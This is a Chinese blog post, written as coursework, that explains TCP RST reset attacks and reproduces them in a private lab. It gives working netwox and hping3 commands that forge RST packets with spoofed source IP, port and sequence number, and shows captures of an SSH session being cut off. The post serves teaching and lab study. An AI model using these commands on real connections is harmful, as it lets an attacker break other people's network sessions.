TCP复位攻击的原理和实战复现|课后作业

ZOUZDC
807 阅读6分钟

本文正在参与 “网络协议必知必会

复位攻击的原理

什么是复位攻击

在了解复位攻击之前,先说一说TCP首部数据中的有几个特殊的标识bit,分别是ACK,RST,SYN,FIN等等.

当指定bit设置为1的时候,该TCP指定就有指定特殊的含义.

比如三次握手中第一次握手SYN=1,四次挥手中第一次挥手FIN=1.在复位攻击的时候就用到了RST标志位.

image

标识位含义
ACK确认序号有效
RST复位,关闭异常连接
SYN同步序号用来发起一个连接
FIN发端完成发送任务

RST复位攻击就是利用TCPRST标志位实现的

通俗来说

小明和小红在谈恋爱, 但是两个人距离比较作为离得比较远,都是通过在小纸条上写名字,让同学帮忙传递.

后来小刚吃醋了,就偷偷的给小红写了分手信,署的小明的名字.

小红以为真的要分手,就熄灭了心中的激情.

后来真的小明的信又来了, 小红直接回复"分手,滚"

小明收到信之后心灰意冷

最终小明和小刚过上了幸福的生活. (hetui)

普通的讲

客户端A和服务端B建立连接之后会互相持有对方的序列号.在序列号,端口号,源IP都符合规则的情况下,服务端就会认为数据是真实有效的,就执行对应的操作.

在这时候客户端C在获取了A,B的重要信息之后,伪造了A的RST操作,并发送给B,

B收到指令之后复位关闭了连接.

真正的A再正常请求A数据的时候,B就认为A请求是一个异常请求,然后给A发送了RST指令,然后A也退出了连接.

实战复现

此处有台式机20.1.0.1

两个虚拟机 分别是 20.1.0.12820.1.0.132

此后用(1) (128)(132) 表示

在这里模拟了两种攻击手段,第一种netwox攻击,第二种hping3攻击.

netwox(128)服务器, (1)是客户机也是攻击机,(132)是检测机

hping3(128)服务器, (1)是客户机, (132)是攻击机

主体内容在netwox下,请顺序观看

netwoxwireshark(1)上, hping3(132)

netwox攻击

  1. (1)Wireshark监听指定网卡上的22端口的请求;(132)通过ssh连接到(128)上 ,执行tcpdump监听22端口.

  2. (1)通过ssh连接到(128)服务器,Wireshark可以看到以下部分记录

805f58d8c97e84afc5be447cffa9dbd.png

红线标识的是最后一条(1)->(128)的TCP指令, 在这里就从选择的这一条获取我们需要的数据

29494d9e323d87646c7ff6ba53a4a1a.png

在这里我们知道了(1)的端口号是58744, 顺序号是782014969,() 并且我们也知道 两个服务器IP.

到了这里我们就可以发起攻击了

netwox 40 -l 20.1.0.1 -m 20.1.0.128 -o 58744 -p 22 -B -q 782014969

-l 伪装的源IP -m 目标IP -o 伪装的源端口号 -p 目标IP的端口号 -B -q 原IP 顺序号 d56c24b89cd6b335733d2071662239e.png

11c7ce933baeac7f105b95dfa27e89d.png 发送完指令之后,我们去Wireshark 就会发现两条伪装的RST指令. 假(1)->(128) RST b1d76ef8be92f717e57cbd58620552f.png 到此(128)重置了连接.

在一定时间之后(一分钟之内),真正(1)上的ssh向(128)发送了请求,这时候(128)已经不认得他了, 然后给他回复了RST信息

349f810aae16315281abfdbb1c4aaf8.png

至此(1)也断开了.

2f381d89987cbf8efe7a2a9049a1ce9.png

是的我这里SSH显示的是Connection closed by foreign host.不是Broken pipe ,是不是很惊讶.

到这里(132)监测服务器上面又有什么呢

d7e2e17c5d4ae8b31b4e4c520704fe8.png

15:15:43.944077 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [.], ack 3474807771, win 2048, length 0
15:15:47.751231 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [P.], seq 782014917:782014969, ack 3474807771, win 2048, length 52
15:15:47.751716 IP 20.1.0.128.ssh > 20.1.0.1.58744: Flags [P.], seq 3474807771:3474807855, ack 782014969, win 270, length 84
15:15:47.792409 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [.], ack 3474807855, win 2048, length 0
15:16:10.784854 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [R], seq 782014969, win 0, length 0
15:16:11.623166 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [P.], seq 782014969:782015005, ack 3474807855, win 2048, length 36
15:16:11.623311 IP 20.1.0.128.ssh > 20.1.0.1.58744: Flags [R], seq 3474807855, win 0, length 0

因此也能根据tcpdump监测来自己测试TCP复位攻击

hping3攻击

  1. (1)Wireshark监听指定网卡上的22端口的请求; (132)作为攻击机, (128)作为服务器

  2. (1)通过ssh连接到(128)服务器,Wireshark可以看到以下部分记录

f3f5ced434f4136fd7edd870dcde837.png

  1. 然后在(132)上执行
sudo hping3 -a 20.1.0.1 -s 57292  -R  20.1.0.128  -p 22  -M 2042569399  -c 1

sudo hping3 -a 伪装的源IP -s 伪装的源端口号 -R 目标IP -p 目标端口号 -M 源IP顺序号 -c 1

1638271558(1).png

到这里去看Wireshark,已经存在了两次RST记录

c4c38d24f274442b18a5fce66b328a3.png

再看(1)的ssh也断开了

Connection closed by foreign host.

最后

搞了两天,从写网络协议-TCP的三次握手网络协议-TCP的四次挥手开始就搜集TCP复位攻击的实例,网上的文章有一半都没有做测试,只有一个开头和一个所谓的结果.剩下的有优秀的,都散落在各种角落不被搜索引擎搜索到.netwox攻击实例是一个外国大学网上找的课件中的例子看明白的,hping3是在一个错误的例子上,综合man注释,和已经成功的netwox攻击上推测出来的.

纸上得来终觉浅,绝知此事要躬行

最后的最后,有知道我用的(132)服务器是啥系统吗😊?

结束语

尽信书则不如,以上内容,纯属一家之言,因个人能力有限,难免有疏漏和错误之处,如发现bug或者有更好的建议,欢迎批评指正,不吝感激

如果您喜欢我的文章,可以[关注]+[点赞]+[评论],您的三连是我前进的动力,期待与您共同成长~

    作者:ZOUZDC
    链接:https://juejin.cn/post/7028963866063306760
    来源:稀土掘金
    著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
avatar
文章
阅读
粉丝